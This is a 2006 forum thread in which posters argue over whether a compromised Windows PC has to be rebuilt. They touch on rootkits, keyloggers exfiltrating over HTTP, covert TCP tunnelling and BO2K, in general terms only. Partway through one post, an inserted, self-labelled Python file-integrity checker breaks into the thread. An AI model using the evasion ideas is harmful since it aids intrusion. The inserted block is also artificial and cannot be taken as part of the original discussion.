keystroke logs or any other local data via http to a remote server.

It would be virtually undetectable without running process mons, rootkit
mons, file mons, network mons 24x7 and analysing every single file touch,
reg touch and byte sent. Even then... it may check for the presence of such
tools and not activate or send data when present.

The bottom line is this.

The machine had this vulnerability SINCE THE DAY YOU BUILT IT.

Exploit code was used to compromise this machine.

You have no idea how many times (above the single detected instance) this
vulnerable machine has been compromised using this, or any other
vulnerability both current known, or yet to be announced.

All code changes made since the machine was built are not known, since you
have not been monitoring every single byte of code change, and even then,
the code changes may have been hidden from such tools.

QED - a machine hosting vulnerable code, once compromised, remains
compromised even after the vulnerability is closed, and the known exploit
code removed.

I re-iterate:

1. Format
2. Rebuild the os
3. Patch to the latest
4. Ensure firewall policies lock access

This is the only way to clean such an exploit infection. Even this will not
prevent the next 0day exploit.

Do you have any idea how much exploitable code Microsoft have released
patches for since the initial release of their o/s? Think about it. This
exploitable code has been in existence, on every single machine with this
build, since day one.

The fact that someone has announced it to M$, and M$ release a patch, means
only that the hole is now closed. That window of opportunity for exploit has
existed SINCE DAY ONE to the latest 'patch tuesday'.

Do you have any idea how long hackers are using malicious code to exploit
vulnerable M$ code, roaming undetected before such a hole becomes noticed or
announced, and then a fix is put in place? That's YEARS of opportunity to
exploit such holes.

Your assertion that you 'know your machine' and are emphatic about its
current trustworthy state is both naive, untenable and illogical given the
above.





Ant

2006-11-05, 1:16 pm

"Sebastian Gottschalk" wrote:

> Ant wrote:
>
> Now you've lost the last sound of professionality.


Funny, that. I enter this thread to explain some Javascript, and you
accuse me of not being professional. Where did I say that computer
security was my profession?

>
> Bullshit. It's unsafe at any rate.


Bullshit to you as well. I have no problems.

>
> Stupid. What about resources?


What about them?

>
> You should refrain from claiming that you know something that can't be
> known ever.


You should refrain from trolling.


Sebastian Gottschalk

2006-11-05, 7:22 pm

erewhon wrote:

> It is possible to insert a piece of malicious code, subsequent to gaining
> access via the initial exploit code, and that such code can hidden by a
> rootkit, and can sit as a hidden process or as a time activated piece of
> code, and wait till an internet connection is available to stream out cached
> keystroke logs or any other local data via http to a remote server.
>
> It would be virtually undetectable without running process mons, rootkit
> mons, file mons, network mons 24x7 and analysing every single file touch,
> reg touch and byte sent.


Even then it could be undetectable, since it could shove the entire system
into a virtual instance. Or, depending on the focus of the kernel function
monitoring, a sufficiently deep kernel modification is already enough.

Monitoring network traffic won't help. You can easily relay data with
almost any host, including legitimate ones like Google, Yahoo, MSN,
nytimes.com, whitehouse.gov, ...

> Even then... it may check for the presence of such tools and not activate
> or send data when present.


Not to mention tunneling like f.e. with slight variations in TCP ISNs.

> Do you have any idea how long hackers are using malicious code to exploit
> vulnerable M$ code, roaming undetected before such a hole becomes noticed or
> announced, and then a fix is put in place? That's YEARS of opportunity to
> exploit such holes.


At least for MSIE, the situation is way worse: Holes are found, become
noticed or announced, get exploited for years, and Microsoft still won't
put a fix in place.

> Your assertion that you 'know your machine' and are emphatic about its
> current trustworthy state is both naive, untenable and illogical given the
> above.


And especially without any evidence.

Sebastian Gottschalk

2006-11-05, 7:22 pm

Ant wrote:

> "Sebastian Gottschalk" wrote:
>
>
> Funny, that. I enter this thread to explain some Javascript, and you
> accuse me of not being professional. Where did I say that computer
> security was my profession?


Well, so now it's safe to call you an amateur who has obviously no clue
what he's talking about and making nonsensical claims.

> Bullshit to you as well. I have no problems.


You being unable to notice your problems doesn't mean that they don't
exist.

>
> What about them?


This is something valuable, to the malicious guys of course. And that's why
you're an interesting target.

And it's definitely your problem, because you'll be held responsible for
your computer being abused to attack other ones.

>
> You should refrain from trolling.


Wise men stick to their own advice as well. Nuff said.

Benjamin Flesch

2006-11-05, 7:22 pm

Sebastian Gottschalk wrote:

>
> This is something valuable, to the malicious guys of course. And that's
> why you're an interesting target.
>
> And it's definitely your problem, because you'll be held responsible for
> your computer being abused to attack other ones.


He means often Windows desktop computers belonging to normal users @ home
who just want to use their computer for surfing the Web (often via MSIE,
that's the sad truth) and doing some mails and stuff like that, and don't even
care about having bots, trojans and other malware on their machine unless
it disturbs them.
And that is why there are such large botnets which use the resources of some
"small" home computer with your 1 or 2 mbit connection.
But if you replace "some" by "thousands" you'll end up with a capacity high
above some GBits which are commonly used to f.ex. DDOS homepages (learn
more at wikipedia en.wikipedia.org/wiki/DDOS)
I hope I was able to show you that your way of dealin' with the
"trojan-thing" is pretty wrong and harms loads of people out there.

cheers benjamin

Ant

2006-11-05, 7:22 pm

"erewhon" wrote:

> Do you have any idea how much exploitable code Microsoft have released
> patches for since the initial release of their o/s? Think about it. This
> exploitable code has been in existence, on every single machine with this
> build, since day one.
>
> The fact that someone has announced it to M$, and M$ release a patch, means
> only that the hole is now closed. That window of opportunity for exploit has
> existed SINCE DAY ONE to the latest 'patch tuesday'.


In which case all Windows installations should be rebuilt every time a
patch is released, because there is no knowing what might have sneaked
in before. The same goes for any other operating system.

> Your assertion that you 'know your machine' and are emphatic about its
> current trustworthy state is both naive, untenable and illogical given the
> above.


Given that I've monitored my system with a variety of tools and
techniques since day one, and kept my eye on the latest exploit
developments, I'll trust my own judgement rather than be swayed by
someone else's paranoia.


Ant

2006-11-05, 7:22 pm

"Sebastian Gottschalk" wrote:

> Ant wrote:
>
> Well, so now it's safe to call you an amateur who has obviously no clue
> what he's talking about and making nonsensical claims.


So it was nonsensical to compare the system binaries against known
clean ones?

>
> You being unable to notice your problems doesn't mean that they don't
> exist.


You telling me I have problems doesn't mean I have them.

>
> This is something valuable, to the malicious guys of course. And that's why
> you're an interesting target.


On a slow dialup that connects for brief periods in the evening and
weekends? I don't think so.

> And it's definitely your problem, because you'll be held responsible for
> your computer being abused to attack other ones.


It would be a problem if that were the case, and I would have heard
about it by now.

>
> Wise men stick to their own advise as well. Nuff said.


I agree. This discussion is going nowhere.


erewhon

2006-11-05, 7:22 pm

> I'll trust my own judgement rather than be swayed by
> someone else's paranoia.


Then your judgement and logic are flawed.

Paranoia is justified if the evidence supports the fact they are actually
out to get you.


erewhon

2006-11-05, 7:22 pm


> On a slow dialup that connects for brief periods in the evening and
> weekends? I don't think so.


It was always long enough for bo2k to send out a notify email, and then to
allow the client to take full control.

If you think 56k is a bottleneck to exploit, then you are more stupid than
you currently appear.



Sebastian Gottschalk

2006-11-05, 7:22 pm

Ant wrote:

>
> In which case all Windows installations should be rebuilt every time a
> patch is released,


No, only if you were remotely vulnerable.

> because there is no knowing what might have sneaked in before.


There is. Checksums!

> The same goes for any other operating system.


Indeed.

>
> Given that I've monitored my system with a variety of tools and
> techniques since day one, and kept my eye on the latest exploit
> developments, I'll trust my own judgement rather than be swayed by
> someone else's paranoia.


Obviously your judgement is very flawed.

Sebastian Gottschalk

2006-11-05, 7:22 pm

Ant wrote:

> "Sebastian Gottschalk" wrote:
>
>
> So it was nonsensical to compare the system binaries against known
> clean ones?


It was nonsensical to claim that this wouldn't be necessary for the Windows
registry. Almost everything there is suitable for automatically invoking
the launch of executable code, therefore a simple look at it won't do -
however, a restore from a safe backup and carefully analyzing the
differences to the current content will.

And you just claimed to compare core binaries. Now what if some application
loads a specific library not belonging to the core components? Or what
about critical system data files like sysmain.sdb? You have to do a full
comparison, whether you like it or not.

>
> You telling me I have problems doesn't mean I have them.


Ignorance is bliss, hein?

>
> On a slow dialup that connects for brief periods in the evening and
> weekends? I don't think so.


It is enough to transfer some data which require heavy processing, and
transfer back the results.

>
> It would be a problem if that were the case, and I would have heard
> about it by now.


Well, and then it's too late.
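The "checksums against a known safe set" method Sebastian describes earlier in the thread, and the full-comparison point made in this post, as an added example that is not code from the thread or from any of its participants. It assumes a manifest of SHA-256 digests taken while the system was known clean and kept offline; every path and file content in `demo()` is constructed for the demonstration.

```python
"""Added example (not from the thread): baseline a tree's SHA-256 digests
while it is known clean, re-hash it later, and report every added, removed
or modified file. Paths and contents in demo() are constructed."""
import hashlib
import os
import tempfile
from pathlib import Path


def hash_file(path: Path, chunk: int = 1 << 16) -> str:
    """SHA-256 of one file, read in chunks so large binaries stay off the heap."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(root: Path) -> dict:
    """Map every regular file under root (relative POSIX path) to its digest.
    Symlinks are skipped so a planted link cannot stand in for another file."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            if p.is_symlink() or not p.is_file():
                continue
            manifest[p.relative_to(root).as_posix()] = hash_file(p)
    return manifest


def compare_manifests(baseline: dict, current: dict) -> dict:
    """The three lists an analyst has to explain: added, removed, modified."""
    base, cur = set(baseline), set(current)
    return {
        "added": sorted(cur - base),
        "removed": sorted(base - cur),
        "modified": sorted(k for k in base & cur if baseline[k] != current[k]),
    }


def demo() -> dict:
    """Constructed scenario: baseline a clean tree, then simulate tampering."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "bin" / "svc.exe").write_bytes(b"original service binary")
        (root / "config.ini").write_text("autostart=svc.exe\n")
        baseline = build_manifest(root)  # in practice: stored offline
        # Simulated compromise: patched binary, dropped loader, deleted config.
        (root / "bin" / "svc.exe").write_bytes(b"original service binary\x90")
        (root / "bin" / "loader.dll").write_bytes(b"unexpected new file")
        (root / "config.ini").unlink()
        return compare_manifests(baseline, build_manifest(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

A difference is only a finding; as the post says, each one still needs an explanation (a legitimate patch, a user action, or a compromise) before the machine can be called clean.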
erewhon

2006-11-06, 7:27 pm

>> Even this will not prevent the next 0day exploit.
>
> There's nothing that can prevent random errors.


Apart from using a more secure o/s

http://www.theregister.co.uk/2006/1...ay_windows_bug/




Sebastian Gottschalk

2006-11-06, 7:27 pm

erewhon wrote:

>
> Apart from using a more secure o/s
>
> http://www.theregister.co.uk/2006/1...ay_windows_bug/


This does not prevent, just limit the effect of errors.

Beside that, it's not a bug of Windows, but a bug in an ActiveX control.
Exploiting requires visiting a malicious website with IE, which is already
equivalent to granting a remote shell.

Even further, MSXML 4.0 isn't even a component of Windows XP by default and
has to be installed by other applications.

Copyright 2003 - 2009 webservertalk.com